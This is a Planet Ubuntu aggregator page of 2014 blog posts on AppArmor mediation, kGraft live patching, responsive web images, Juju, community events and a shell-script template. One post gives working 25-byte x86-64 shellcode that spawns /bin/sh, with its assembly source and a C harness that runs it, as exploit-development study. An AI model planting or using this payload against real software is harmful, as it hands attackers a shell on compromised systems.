news aggregator

Jamie Strandboge: Application isolation with AppArmor – part IV

Planet Ubuntu - Fri, 2014-06-06 20:20

Last time I discussed AppArmor, I talked about new features in Ubuntu 13.10 and a bit about ApplicationConfinement for Ubuntu Touch. With the release of Ubuntu 14.04 LTS, several improvements were made:

  • Mediation of signals
  • Mediation of ptrace
  • Various policy updates for 14.04, including new tunables, better support for XDG user directories, and Unity7 abstractions
  • Parser policy compilation performance improvements
  • Google Summer of Code (SUSE sponsored) python rewrite of the userspace tools
Signal and ptrace mediation

Prior to Ubuntu 14.04 LTS, a confined process could send signals to other processes (subject to DAC) and ptrace other processes (subject to DAC and YAMA). AppArmor on 14.04 LTS adds mediation of both signals and ptrace which brings important security improvements for all AppArmor confined applications, such as those in the Ubuntu AppStore and qemu/kvm machines as managed by libvirt and OpenStack.

When developing policy for signal and ptrace rules, it is important to remember that AppArmor does a cross check such that AppArmor verifies that:

  • the process sending the signal/performing the ptrace is allowed to send the signal to/ptrace the target process
  • the target process receiving the signal/being ptraced is allowed to receive the signal from/be ptraced by the sender process

Signal(7) permissions use the ‘signal’ rule with the ‘receive/send’ permissions governing signals. PTrace permissions use the ‘ptrace’ rule with the ‘trace/tracedby’ permissions governing ptrace(2) and the ‘read/readby’ permissions governing certain proc(5) filesystem accesses, kcmp(2), futexes (get_robust_list(2)) and perf trace events.

Consider the following denial:

Jun 6 21:39:09 localhost kernel: [221158.831933] type=1400 audit(1402083549.185:782): apparmor="DENIED" operation="ptrace" profile="foo" pid=29142 comm="cat" requested_mask="read" denied_mask="read" peer="unconfined"

This demonstrates that the ‘cat’ binary running under the ‘foo’ profile was unable to read the contents of a /proc entry (in my test, /proc/11300/environ). To allow this process to read /proc entries for unconfined processes, the following rule can be used:

ptrace (read) peer=unconfined,

If the receiving process was confined, the log entry would say ‘peer=”<profile name>”‘ and you would adjust the ‘peer=unconfined’ in the rule to match that in the log denial. In this case, because unconfined processes implicitly can be readby all other processes, we don’t need to specify the cross check rule. If the target process was confined, the profile for the target process would need a rule like this:

ptrace (readby) peer=foo,

Likewise for signal rules, consider this denial:

Jun 6 21:53:15 localhost kernel: [222005.216619] type=1400 audit(1402084395.937:897): apparmor="DENIED" operation="signal" profile="foo" pid=29069 comm="bash" requested_mask="send" denied_mask="send" signal=term peer="unconfined"

This shows that ‘bash’ running under the ‘foo’ profile tried to send the ‘term’ signal to an unconfined process (in my test, I used ‘kill 11300′) and was blocked. Signal rules use ‘read’ and ‘send to determine access, so we can add a rule like so to allow sending of the signal:

signal (send) set=("term") peer=unconfined,

Like with ptrace, a cross-check is performed with signal rules but implicit rules allow unconfined processes to send and receive signals. If pid 11300 were confined, you would adjust the ‘peer=’ in the rule of the foo profile to match the denial in the log, and then adjust the target profile to have something like:

signal (receive) set=("term") peer=foo,

Signal and ptrace rules are very flexible and the AppArmor base abstraction in Ubuntu 14.04 LTS has several rules to help make profiling and transitioning to the new mediation easier:

# Allow other processes to read our /proc entries, futexes, perf tracing and
# kcmp for now
ptrace (readby),
 
# Allow other processes to trace us by default (they will need
# 'trace' in the first place). Administrators can override
# with:
# deny ptrace (tracedby) ...
ptrace (tracedby),
 
# Allow unconfined processes to send us signals by default
signal (receive) peer=unconfined,
 
# Allow us to signal ourselves
signal peer=@{profile_name},
 
# Checking for PID existence is quite common so add it by default for now
signal (receive, send) set=("exists"),

Note the above uses the new ‘@{profile_name}’ AppArmor variable, which is particularly handy with ptrace and signal rules. See man 5 apparmor.d for more details and examples.

14.10

Work still remains and some of the things we’d like to do for 14.10 include:

  • Finishing mediation for non-networking forms of IPC (eg, abstract sockets). This will be done in time for the phone release.
  • Have services integrate with AppArmor and the upcoming trust-store to become trusted helpers (also for phone release)
  • Continue work on netowrking IPC (for 15.04)
  • Continue to work with the upstream kernel on kdbus
  • Work continued on LXC stacking and we hope to have stacked profiles within the current namespace for 14.10. Full support for stacked profiles where different host and container policy for the same binary at the same time should be ready by 15.04
  • Various fixes to the python userspace tools for remaining bugs. These will also be backported to 14.04 LTS

Until next time, enjoy!


Filed under: canonical, security, ubuntu, ubuntu-server

Chris J Arges: using kgraft with ubuntu

Planet Ubuntu - Fri, 2014-06-06 18:50
New live kernel patching projects have hit LKML recently [1][2], and I've taken the opportunity to test drive kGraft with the Ubuntu kernel. This post documents how to get a sample patch working.
A Simple ExampleFirst, I had to take the patches from [3] and apply them against the ubuntu-utopic kernel, which is based on 3.15-rc8 as of this post. They cherry-picked cleanly and the branch I'm using is stored here [4]. In addition to applying the patches I had to also enable CONFIG_KGRAFT. A pre-built test kernel can be downloaded here [5].

Next, I created a test VM and installed the test kernel, headers, and build dependencies into that VM and rebooted. Now after a successful reboot, we need to produce an actual patch to test. I've created a github project [6] with the sample patch; to make it easy to clone and get started.

sudo apt-get install git build-essentialgit clone https://github.com/arges/kgraft-examples.git
cd kgraft-examples
make

The code in kgraft_patcher.c is the example found in samples/kgraft [7]. Now we can build it easily using the Makefile I have in my project by typing make.

Next, the module needs to be inserted using the following:

sudo insmod ./kgraft_patcher.ko

Run the following to see if the module loaded properly:

lsmod | grep kgraft

You'll notice some messages printed with the following:

[ 211.762563] kgraft_patcher: module verification failed: signature and/or required key missing - tainting kernel
[ 216.800080] kgr failed after timeout (30), still in degraded mode
[ 246.880146] kgr failed after timeout (30), still in degraded mode
[ 276.960211] kgr failed after timeout (30), still in degraded mode
This means that not all processes have entered the kernel and may not have a "new universe" flag set.  Run the following to see which processes still needs to be updated.

cat /proc/*/kgr_in_progress

In order to get all processes to enter the kernel sometimes a signal needs to be sent to get the process to enter the kernel.

An example of this is found in the kgraft-examples [6] called 'hurryup.sh':

#!/bin/bash
for p in $(ls /proc/ | grep '^[0-9]'); do
if [[ -e /proc/$p/kgr_in_progress ]]; then
if [[ `sudo cat /proc/$p/kgr_in_progress` -eq 1 ]]; then
echo $p;
sudo kill -SIGCONT $p
fi
fi
done

Here is checks for all processes that have 'kgr_in_progress' set and sends a SIGCONT signal to that process. 
I've noticed that I had to also send a SIGSTOP followed by a SIGCONT to finally get everything synced up.
Eventually you'll see:
[ 1600.480233] kgr succeeded
Now your kernel is running the new patch without rebooting!
References
  1. https://lkml.org/lkml/2014/4/30/477
  2. https://lkml.org/lkml/2014/5/1/273
  3. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/
  4. http://zinc.ubuntu.com/git?p=arges/ubuntu-utopic.git;a=shortlog;h=refs/heads/kgraft-utopic
  5. http://people.canonical.com/~arges/kgraft-utopic/
  6. https://github.com/arges/kgraft-examples
  7. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/samples/kgraft/kgraft_patcher.c?h=kgraft
  8. https://git.kernel.org/cgit/linux/kernel/git/jirislaby/kgraft.git/tree/tools/kgraft/create-stub.sh?h=kgraft

Rhonda D'Vine: No Portland

Planet Ubuntu - Fri, 2014-06-06 12:55

This year's debconf in portland will happen without me being there. As much as I would love to be at home again, I won't be able to afford it. As much as I'd liked to help to keep portland weird, a discussion led to the feeling that I'm not welcome there and along that lines made me miss the deadline for sponsorship request due to not being very motivated to push for it because of that. And without sponsorship I won't be able to afford it, given that I need to save up for my upcoming move.

This also means I won't be able to host the Poetry Night. I hope that someone will be picking up that ball and continue it. Personally I am more motivated than ever to start writing again, given that there is currently a Bus Bim Slam (Bus Tram Slam) happening over here in Vienna and I try to attend as much stations as possible, and there will be a Diary Slam during this year's FemCamp Vienna.
I'm indifferent on whether the Debconf Poetry Night should be recorded or not. On the one hand it would be great to see people performing, on the other hand it might shy away certain personal poems that one wouldn't want to have out in the wild. Whoever picks it up, think about that part.

I wish everyone luck in Portland, and I'm looking forward to yet another great job by the video team so I can follow a few talks from at home. It sort of breaks my heart to not be able to hug you lot this year, and I wish you a great conference. We'll meet again next year in Heidelberg!

/debian | permanent link | Comments: 1 |

Canonical Design Team: Making ubuntu.com responsive: dealing with responsive images (10)

Planet Ubuntu - Fri, 2014-06-06 09:30

This post is part of the series ‘Making ubuntu.com responsive‘.

Deciding how you’re going to handle responsive images is a big part of most responsive projects — also, one that usually causes many headaches!

We had really interesting discussions within the team to try to find out which options were out there, being used by other people, and whether those solutions could be useful (and possible) for us.

There is a range of solutions and opinions on this matter, but ultimately it’s all down to the content and types of images your website actually has to handle, and the technical and resource limitations of your team.

We tried to keep an open mind as to what would be possible to achieve within a very small timeframe: we wanted to find a solution that would work for our content, that would be achievable within our deadlines, and obviously, that would improve the experience of the visitors to our site.

Making an image inventory

Before discussing any potential solutions, it’s important to understand exactly what type of images are used on your site, how they are created, who creates them, how they are added to the site and in which locations, how the images play with the content and whether there are different levels of importance (UI icons, purely decorative images, infographics, editorial images, etc.).

You might realise you only use UI icons and vector illustrations, or that all your images are decorative and secondary, or even that all your images are photos commissioned to professional photographers and photojournalists that add great value to your content and designs. It’s only after doing this inventory that you’ll have sufficient information to decide what to do next and what your site needs.

On ubuntu.com there are five different types of image assets:

  • Pictograms: from an existing set of pre-approved pictograms, created in various formats, in a small subset of colours
  • Illustrations: usually created using two or more pictograms, or in a similar style, in vector format
  • Photography: these can be product shots of devices, screengrabs of our operating system and applications, and sometimes other types of photographic images
  • Logos: not only Ubuntu and Canonical’s own logos, but several partner logos
  • Backgrounds: these can be anything from dot patterns to textured backgrounds

Pictograms, illustrations, photography, logos and backgrounds are part of the image arsenal of ubuntu.com.

The pictograms and illustrations are always created in vector format and can easily be exported to an SVG. Similarly, many of the logos we use on the site can be sourced in an SVG format, but many times this isn’t possible. The photography and backgrounds used on the site, however, are usually provided to us in bitmap format, that lose definition when scaled up.

With this inventory in mind, we knew we’d have to come up with different solutions for the different types of assets rather than a single solution for all images.

Scalable vectors: pictograms, illustrations and logos

We investigated the possibility of creating a font for our icons and even started this process, but quickly decided that the lack of consistent browser support wasn’t acceptable.

The decision to move from GIF and PNG icons to SVG was relatively straightforward for us, as all our icons and pictograms are created in vector format from the outset. This would allow us to have crisp, scalable icons in most browsers, whether the device has a retina screen or not.

It was at this point that we thought it would be a good idea to finally introduce Modernizr into our toolset. With Modernizr we could target browsers that don’t support SVG and serve them with a PNG image replacement.

We did run into some browser support issues, mainly with Opera Mini which doesn’t support background-size (necessary if you’re scaling the same image asset instead of creating copies at different sizes) but does support SVG. To solve this problem, Ant wrote a JavaScript snippet that detects Opera Mini and adds the class .opera-mini to the body of the document. He will be covering this in more detail in a following post in this series.

Opera Mini’s SVG rendering issues.

We have explored the possibility of dynamically changing the colours of our SVG pictograms, but haven’t yet found a solution that is compatible across browsers — we’re open to suggestions!

Bitmap formats: photography and backgrounds

This is where things usually get trickier: how do you create a balance between serving users the best quality image they can get and saving their bandwidth?

Ideally, we’d have had the time to add the ability of images to be called on the fly in the size needed, so that the user didn’t have to download a size that was not intended for his or her screen size. This is something that we still want to work on, but just couldn’t justify to be added to the scope of this first iteration of the responsive transition.

Eventually we decided to use Imager.js — made by the BBC News developers — for responsive imaging in the markup. We chose this solution as it has simple syntax and is being used in production on high traffic websites, so it was proven to work. It seemed like a simple solution that fit our needs. In simple terms, the script runs through the page, looking up placeholder elements and replacing them with the closest available image size based on the width of the container.

CSS helper classes

We’ve created three CSS classes that can be used to hide/show images and other elements according to the size of the viewport:

  • .for-small: only shows in the smallest media query viewport
  • .for-medium: only shows in the small and medium media query viewports
  • .not-for-small: doesn’t show in the smallest media query viewport

These classes give us enough flexibility to decide which images should be visible based on our breakpoints in cases where we need more control. This means if we change the breakpoints, the classes will inherit the change.

File size

Initially we were planning on creating several versions of the images on the site, for small, medium and large screen sizes, but we found out that some of the current images on the site had a much larger file size than they needed to — for example, some transparent PNGs were being used when transparency was not a requirement.

With the limited time available, we opted for focusing on reducing file sizes as much as possible for existing images as a priority. This way, we’d make our pages smaller but small higher density screens would still see crisp images, since at smaller sizes they’d be reduced to about half their original size.

You can see a comparison of the file size per section of the site before and after this process.

Section Size before Ubuntu 14.04 LTS release (KB) Size after Ubuntu 14.04 LTS release (KB) Homepage 434 193 About 1460 1787 Cloud 2809 2304 Desktop 3794 2571 Download 2921 3990 Management 991 1102 Partners 2243 2320 Phone 6943 2021 Server 1483 636 Support 679 480 Tablet 3318 1829 TV 603 733

We obtained these sizes using a combination of YSlow and PhantomJS.

Some of the sections were expanded for the Ubuntu 14.04 LTS release in April, which justifies some of the increases. The desktop, phone and tablet sections, however — the worst offenders — saw a significant reduction in file size, mainly from switching to the most appropriate file format instead of all PNGs.

Another way to create more consistency and file size savings across the site was the introduction of a pictogram and logo package. Instead of creating pictograms ad-hoc as needed, we now have a defined set of pictograms in a central location that can be reused across the site, in all its different colour variations. Because the pictograms and many of the logos are provided in an SVG format, they can be scaled to the size that is needed.

Ideas for the future

Despite the visible improvements, there are plenty of things we’d still like to explore in the way we handle images in a responsive world.

We are currently working on an asset server that will allow us to dynamically request different sizes and formats of assets (for example, SVG to PNG), which we can offset, crop, etc., right from the src property, also being far more cacheable with long expiry times. It will also make it easier to share assets, as they will be located at a permanent URL and will become findable through a database and metadata, which should encourage reuse.

These were the solutions we came up with and worked best with your timescales and resources. We’d love to hear how you’ve handled images in your responsive projects too, so let us know in the comments!

Reading list

Ubuntu Podcast from the UK LoCo: S07E10 – The One with the Ultimate Fighting Champion

Planet Ubuntu - Fri, 2014-06-06 06:57

We’re back with Season Seven, Episode Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Tony Whitmore, and Laura Cowen are drinking tea and eating very rich chocolate cake (like this one, only more chocolatey) in Studio L.

 Download OGG  Download MP3 Play in Popup

In this week’s show:

  • We interview Martin Wimpress from the MATE desktop team.
    • If you want to know the memory requirements of the many different desktop environments, see his blog.
    • Also, he is a maintainer of the MATE LiveCD.
  • We also discuss:
    • Beards. Again.
    • Secret projects that can’t be talked about.
    • Getting even closer to sending Tony up a mountain in Malawi.
    • Going on an Ubuntu Sprint to Malta.
    • Moving web and email hosting to Clook, a Northern hosting service.
  • We share some Gooey Lurve from Mark:
    “Undo Closed Tab” in Firefox
  • And we read your feedback – thanks for sending it in!

We’ll be back next week, so please send your comments and suggestions to: podcast@ubuntu-uk.org
Join us on IRC in #uupc on Freenode
Leave a voicemail via phone: +44 (0) 203 298 1600, sip: podcast@sip.ubuntu-uk.org and skype: ubuntuukpodcast
Follow us on Twitter
Find our Facebook Fan Page
Follow us on Google+

Benjamin Kerensa: Speaking at OSCON 2014

Planet Ubuntu - Fri, 2014-06-06 05:52

Mozillians at OSCON 2013

In July, I’m speaking at OSCON. But before that, I have some other events coming up including evangelizing Firefox OS at Open Source Bridge and co-organizing Community Leadership Summit. But back to OSCON; I’m really excited to speak at this event. This will be my second time speaking (I must not suck?) and this time I have a wonderful co-speaker Alex Lakatos who is coming in from Romania.

For me, OSCON is a really special event because very literally it is perhaps the one place you can find a majority of the most brilliant minds in Open Source all at one event. I’m always very ecstatic to listen to some of my favorite speakers such as Paul Fenwick who always seems to capture the audience with his talks.

This year, Alex and I are giving a talk on “Getting Started Contributing to Firefox OS,” a platform that we both wholeheartedly believe in and we think folks who attend OSCON will also be interested in.

#OSCON 2014 presents “Getting Started Contributing to Firefox OS” by @bkerensa of @mozilla http://t.co/f1iumzhg1q

— O’Reilly OSCON (@oscon) May 14, 2014

 


And last but not least, for the first time in some years Mozilla will have a booth at OSCON and we will be doing demos of the newest Firefox OS handsets and tablets and talking on some other topics. Be sure to stop by the booth and to fit our talk into your schedule. If you are arriving in Portland early, then be sure to attend the Community Leadership Summit which occurs the two days before OSCON, and heck, be sure to attend Open Source Bridge while you’re at it.

The Fridge: Renewed call for 12:00 UTC Membership Board Nominees

Planet Ubuntu - Thu, 2014-06-05 18:04

At the end of April we called for nominations to the Membership Board, this board oversees the addition of people to Ubuntu Members, needless to say we, and we would hope you, believe this to be an important part of the Ubuntu Community.

Since then the Membership Board has received some nominations, however, up to now all the received nominations are for the 22:00UTC board.

So… we are in need of people that are able to fulfill this important job specifically for the 12:00UTC.

If you fulfill the requirements to be nominated AND can do so at the all important time slot please consider either nominating yourself or somebody else (please confirm they wish to accept the nomination and state you have done so), please send a mail to the membership boards mailing list (ubuntu-membership-boards at lists.ubuntu.com) by Friday, June 20th. You will want to include some information about yourself (or the applicant you are nominating) and a launchpad profile link.

To recap on the requirements for this position

  • be an Ubuntu member (preferably for some time)
  • be confident that you can evaluate contributions to various parts of our community
  • be committed to attending the membership meetings at 12:00UTC
  • broad insight into the Ubuntu community at large is a plus

Additionally, those sitting on membership boards are current Ubuntu Members with a proven track record of activity in the community. They have shown themselves over time to be able to work well with others and display the positive aspects of the Ubuntu Code of Conduct. They should be people who can discern character and evaluate contribution quality without emotion while engaging in an interview/discussion that communicates interest, a welcoming atmosphere, and which is marked by humanity, gentleness, and kindness. Even when they must deny applications, they should do so in such a way that applicants walk away with a sense of hopefulness and a desire to return with a more complete application rather than feeling discouraged or hurt.

Without sufficient people to run the 12:00 UTC session we are in a position where it is possible that we’ll be forced to move to running only one session for Ubuntu Membership. We’d hate to see this happen, but if so, the Community Council will work closely with the Membership Board to make sure we serve the needs of the APAC region, possibly through a modified membership application process for people who are unable to attend the 22:00 UTC session.

Elizabeth K. Joseph, on behalf of the Ubuntu Community Council

Zygmunt Krynicki: Moving to my own email address

Planet Ubuntu - Thu, 2014-06-05 17:02
So I've been using Gmail for a good while. I have three accounts, one personal, one for Canonical personality and one dead for my Linaro personality.

Using Google products with more than one account is a frustrating experience. Especially with hangouts that apparently just don't work at all without private browsing. But that's just a minor annoyance.

The Linaro experience taught me that nothing lasts unless you own it. With that in mind I've decided to move my primary personal address away from @gmail.com to my own domain.

My new address is related to my twitter handle @zygoon (since my usual nickname was not available) on my own domain, zygoon.pl. If, by any chance, you have zkrynicki@gmail.com in your address book I'd like to ask you to update it to:

me@zygoon.pl
I've published updated GPG keys in case you were wondering.

Jos&eacute; Antonio Rey: Need help rooting or flashing your Nexus device? The solution is here!

Planet Ubuntu - Thu, 2014-06-05 03:40

A couple days ago, Android 4.4.3 was released. I have a Nexus device, so I was waiting for the OTA update. I had the 4.4.2 update on the queue, though, so I decided to go ahead and apply it. But my recovery partition had the TeamWin Recovery installed, which didn’t like the upgrade. So, I asked a friend of mine and he ended up giving me a simple solution for my flashing and rooting problems: Nexulockr.

Nexulockr is a program written by Ian Santopietro, which makes the task of managing your Nexus device (in terms of the previously mentioned stuff) way too easy. So, I went ahead and downloaded the Android 4.4.3 factory image for my device, and patiently waited. Well, I couldn’t expect to download it quickly with this 400 KB/s connection. While I did, the new Nexulockr version finished uploading, and I was getting ready to add the PPA to my machine. Doing it is as simple as executing the following commands:

sudo add-apt-repository ppa:nexulockr-dev/nexulockr-beta
sudo apt-get update
sudo apt-get install nexulockr

That, after another bit of waiting, installed Nexulockr into my machine. And I was ready to go! I opened the program and this magic screen appeared (with all my device info, of course):

The process of flashing the image was super quick and easy. I just clicked on the right button, and this other window appeared:

In the factory image I downloaded, I got lots of .img files compressed into one gzip. Problem is, sometimes you don’t know what image to flash first or last. Nexulockr solves this problem by having the buttons in the order the images need to be flashed. I went ahead and started flashing the images. No additional efforts were needed on my side, just selecting the image and clicking that automagic button while my phone was connected.

The next day, I found out my root had disappeared (for obvious reasons), so I had to root my phone again. Guess what – Nexulockr also helped me with that. I went ahead, connected my phone, and clicked the “Root” button. I selected “Root device” and I just had to do one press on my phone to confirm the root. And that was it. No tedious command line interaction!

The developer states that Nexulockr may work with some other devices, but this is not guaranteed. Still, for all those of you with Nexus devices, this may come in handy at some point. As I am writing this, a build for the beta package is ongoing. So, why not give it a try after it’s done?


Fumihito YOSHIDA: Ubuntu 14.04 LTS release party + Offline meeting 14.04 Tokyo

Planet Ubuntu - Thu, 2014-06-05 03:11
A few weeks ago, Ubuntu Japanese Team convene "Ubuntu 14.04 LTS release party + Offline meeting 14.04" with co-sponsored by GREE, Inc and around 100 attendances. That event combine the hackathon and seminar sessions, we have it both ways.

Virtual tour:
1) A lot of sandwitchs (for 100 enlister) and party dishes.


Note: These represent just the tip of the iceberg. But, they completely-disappeared within 20 minutes....:)


2) A lot of Ubuntu 14.04 LTS CDs (From LoCo kit, thanks Canonical!) with *pretty* stuffed Tahr and Unicorn (owner: Shibata Mitsuya).






3) Terazono Junya with LipoD(Lipovitan D, Japanese popular energy drink).
 


4) Large screen (very nice, thanks GREE!)



5) Retrospective by Jun. Ubuntu Japanese Team create "Ubuntu Japanese Remix" for a long time (about 8years), He is great leader.




6) Seminar by Tokura Aya (Microsoft). She is evangelist/image character of Microsoft Azure/Cloud in Japan.
 



7) Seminar by Shiobara Hiroaki(GMO Internet). He escort "Mikumo-Conoha", the macot fay of "ConoHa" (CMO's Cloud service). 
 

8) Seminar by Yokota Masatoshi(Sakura Internet), He and Mr. Shiobara starts a verbal battle like Wrestling Entertainment (Its entertainment. They keep friendliness and respets, but thats engage in a heated debate. I Know, they give the right hand of fellowship after sessions. :) ).



One of sessions theme are "Retrospective", overview for 10 years of ubuntu.

- "Ubuntu and Me, a certain ubuntu user's voice" by Terazono Junya (indivisual, but he is famous planetary informatics scientist, a.k.a. "Hayabusa project's PR expert with LipoD" ).
- "Retrospective last 10 years" by Kobayashi Jun (Ubuntu Japanese Team)

Another seminar sessions focused "VPS and Cloud production environment with Ubuntu", line-up as follows.

- "Ubuntu + Microsoft Azure, Quickguide before a you use Azure"  by Tokura Aya, a.k.a. "Cloudia Madobe" (Microsoft Corporation).
- "Ubuntu on Microsoft Azure" by Tsumura Akira (Japan Azure User Group)
- "GMO Cloud with Ubuntu 14.04" by Shiobara Hiroaki (GMO Internet)
- "Using Ubuntu on Sakura's VPS/Cloud" by Yokota Masatoshi (Sakura Internet)
- "Using Juju for your Ubuntu environment" by Matsumoto Takenori (Canonical)

Yes, they are awesome presenters(thanks!), they distribute Ubuntu environment as a Cloud/VPS operator. We can use Ubuntu on there VPS/Cloud service with your one-click operation. Excellent!


And, You can check an another report on gihyo.jp (http://gihyo.jp/admin/serial/01/ubuntu-recipe/0325) by Terauchi Yasuyuki (in Japanese), that sponsored by GIHYO.

In closing, I would like to thank you all for convention. Thanks a lot!

David Tomaschik: Minimal x86-64 shellcode for /bin/sh?

Planet Ubuntu - Thu, 2014-06-05 01:54

I was trying to figure out the minimal shellcode necessary to launch /bin/sh from a 64-bit processor, and the smallest I could come up with is 25 bytes: \x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05.

This was produced from the following source:

BITS 64 main: mov rbx, 0xFF978CD091969DD1 neg rbx push rbx xor eax, eax cdq xor esi, esi push rsp pop rdi mov al, 0x3b ; sys_execve syscall

Compile with nasm, examine the output with objdump -M intel -b binary -m i386:x86-64 -D shellcode.

Here's a program for testing:

#include <sys/mman.h> #include <stdint.h> char code[] = "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x31\xc0\x99\x31\xf6\x54\x5f\xb0\x3b\x0f\x05"; int main(){ mprotect((void *)((uint64_t)code & ~4095), 4096, PROT_READ|PROT_EXEC); (*(void(*)()) code)(); return 0; }

I'd like to find a good tool to compile my shellcode, extract as hex, build a test bin, and run it, all in one. Should be a trivial python script, actually.

Daniel Pocock: Trialing the xTuple/PostBooks next generation web UI

Planet Ubuntu - Wed, 2014-06-04 20:35

For some time I've been using PostBooks to keep track of finances. The traditional PostBooks system has a powerful Qt GUI.

The xTuple team have been hard at work creating a shiny new web-based user interface.

The traditional UI has no dedicated server - all users communicate directly with the PostgreSQL database where stored procedures and triggers ensure the correct logic is applied.

The new model provides an xTuple application server that can handle requests from web users and potentially other third-party apps too.

Who is it for?

Some people may feel that the web UI is intended to appeal to mobile users. While it is useful for mobile and tablet devices, this is not strictly the aim, John has discussed this in a blog.

One benefit of the web UI is that accountants and book-keepers do not need to have a copy of every exact PostBooks version that every client is using. Given that many people only need their accountant to look at their books for just a few hours at the end of each year, the ease of access with a web UI will make a big difference.

Trying it out quickly

The xTuple Git repository provides a script to install the whole server quickly. Initially it just supported a single Ubuntu release, I just contributed some tweaks to generalize it for Debian wheezy and potentially other releases. It doesn't appear too difficult to generalize it further for Fedora or RHEL users.

To get going, I recommend trying it in a fresh virtual machine, either in a server environment or desktop VirtualBox solution. The installation script will install various packages on the machine and mess about with the PostgreSQL setup so you will not want to run the automated setup script on any machine where you have existing databases.

Once the virtual machine is setup, make sure sudo is installed and configured:


# apt-get install sudo
# visudo

and then run the install as your normal user:


git clone --recursive git://github.com/xtuple/xtuple.git
cd xtuple
git remote add XTUPLE git://github.com/xtuple/xtuple.git
git fetch XTUPLE
git checkout `git describe --abbrev=0`
chmod a+x scripts/install_xtuple.sh
scripts/install_xtuple.sh

If all goes well, 5-10 minutes later it is ready to run:


cd node-datasource
node main.js

The port numbers will appear on the screen and you can connect with a web browser.

Trying it out

Despite my comments above to the effect that this is not primarily aimed at mobile, the first and second device I tested with were both mobile devices, Samsung Galaxy S3 and a Samsung Galaxy Note 3. I feel the Note is far better for this type of application, primarily due to screen size and the fact that most of the forms in the application have fields that launch popup menus. It appears to work in both Chrome and Firefox on these devices.

One handy feature is that the mobile device can dial numbers directly from the CRM address book, this is facilitated with the tel URI.

My impression is that this is still a product that is in the final stages of development, although some people will be able to use it almost immediately. One significant thing to note is that the database schema is very stable due to the long history of the traditional xTuple/PostBooks products.

The Fridge: Alternate Meeting Channel

Planet Ubuntu - Wed, 2014-06-04 20:24

Over the past several years the Ubuntu community has grown to encompass projects that range a variety of teams that work on everything from tablets to servers.

We’ve recently been seeing an increase in meeting time collisions among teams, so we’ve decided to go ahead and open an alternate meeting channel called #ubuntu-meeting-2 where teams can host their meetings if a meeting is already happening in #ubuntu-meeting during the time they want to host their own meeting. The Ubuntu Technical Board was the first to have their meeting on the schedule for this new channel!

If your team wants to have their meetings scheduled in our meetings ground, please let us know by dropping an email to ubuntu-news-team@lists.ubuntu.com or contacting us on IRC at #ubuntu-news on irc.freenode.net (click here to join from your browser).

Aurélien Gâteau: A template for shell-based command-line scripts

Planet Ubuntu - Wed, 2014-06-04 16:54

If you write shell scripts, you may be familiar with the situation where you wrote a script, and now would like to extend it to add some optional argument. Said script being a temporary hack (as temporary as those tend to be...) you end up writing a quick'n'dirty command-line parser, suffering limitations like fixed argument orders or other things which make tools annoying to use, but which would take too much time to get right than would be worth for this tiny shell script.

I felt this annoyance many times while writing scripts. To avoid that situation, I used to have a template which made use of the getopt binary but I always found it cumbersome: annoying to work with and hard to read again when coming back to my code after a while. Recently I came up with a simpler, slightly more manual, alternative.

The whole template looks like this:

#!/bin/sh set -e PROGNAME=$(basename $0) die() { echo "$PROGNAME: $*" >&2 exit 1 } usage() { if [ "$*" != "" ] ; then echo "Error: $*" fi cat << EOF Usage: $PROGNAME [OPTION ...] [foo] [bar] <Program description>. Options: -h, --help display this usage message and exit -d, --delete delete things -o, --output [FILE] write output to file EOF exit 1 } foo="" bar="" delete=0 output="-" while [ $# -gt 0 ] ; do case "$1" in -h|--help) usage ;; -d|--delete) delete=1 ;; -o|--output) output="$2" shift ;; -*) usage "Unknown option '$1'" ;; *) if [ -z "$foo" ] ; then foo="$1" elif [ -z "$bar" ] ; then bar="$1" else usage "Too many arguments" fi ;; esac shift done if [ -z "$bar" ] ; then usage "Not enough arguments" fi cat <<EOF foo=$foo bar=$bar delete=$delete output=$output EOF

Note: the die function is not used by the template itself, but most of the scripts I write needs such a function at some point, which is why it is there.

This template supports:

  • Short and long options (-d and --delete for example)
  • Options with and without arguments
  • Arbitrary position for options: myscript foo -d will do the same as myscript -d foo
  • Aborting when invalid options are passed
  • Checks for mandatory positional arguments

This last feature is done in two parts. First the *) case in the while loop sets variables as it goes through arguments and aborts if too many arguments are passed. Once the code leaves the while loop, a check is done on the last argument: if it is empty the code aborts complaining about missing arguments.

Supporting a variable number of arguments

A common change is accepting a variable number of arguments. If you are confident your arguments will never contain spaces or other weird characters, then you can do the following changes:

  1. Declare an empty args variable before the while loop:

    args=""
  2. Replace the code in the *) case with something like this:

    *) args="$args $1" ;;
  3. Remove the check for the last argument or alter it to check if args is empty.

  4. Iterate over the arguments with:

    for arg in $args ; do # Do work here done

If you want to support arguments which contain spaces, that's another story. The simplest solution I know of is to make use of Bash arrays. The changes would thus look like this:

  1. Change the shebang to #!/bin/bash.

  2. Declare an empty args array before the while loop:

    args=()
  3. Replace the code in the *) case with something like this:

    *) args=(${args[@]} "$1") ;;
  4. Same as before: remove the check for the last argument or alter it to check if args is empty.

  5. Iterate over the arguments with:

    for arg in ${args[@]} ; do # Do work here done

Higher percentage of cabalistic symbols in there, but that's the price one has to pay to manipulate arrays with Bash.

Pros and cons

Compared to getopt, this template has a few advantages but also limitations one must be aware of:

  • Pros
    • No need to list the options again in a call to getopt
    • Less boilerplate: getopt requires you to run it, then eval its output
    • Positional arguments are handled in the same loop which handles the options
  • Cons
    • No support for concatenated short options: -ab is not the same as -a -b.
    • No support for separating option arguments with an equal sign: you must write --output file.log and not --output=file.log.

That's it for this template, hope it is useful to you.

Jorge Castro: Juju is now on Github

Planet Ubuntu - Wed, 2014-06-04 13:55

We’ve got some changes in Juju and the Juju ecosystem that have been landing this week.

Ian Booth announced the move of Juju core to github.com. You can find all our work at: https://github.com/juju.

Workflow instructions for contributing are available in the CONTRIBUTING file. Ian also adds:

Once the dust settles on the migration of juju-core, we’ll also be migrating various dependencies like goose, gwacl, gomaasapi and golxc.

You can find the code for Juju Core at: https://github.com/juju/juju

On a related note, we have a one way mirror of the Juju Charm Store as well: https://github.com/charms

You can combine these with Francesco Banconi’s git-deploy plugin to deploy right from github, as an example:

juju git-deploy charms/mysql

Hopefully 2-way syncing will be possible soon, stay tuned!

David Murphy: Enabling Students in a Digital Age: Charlie Reisinger at TEDxLancaster

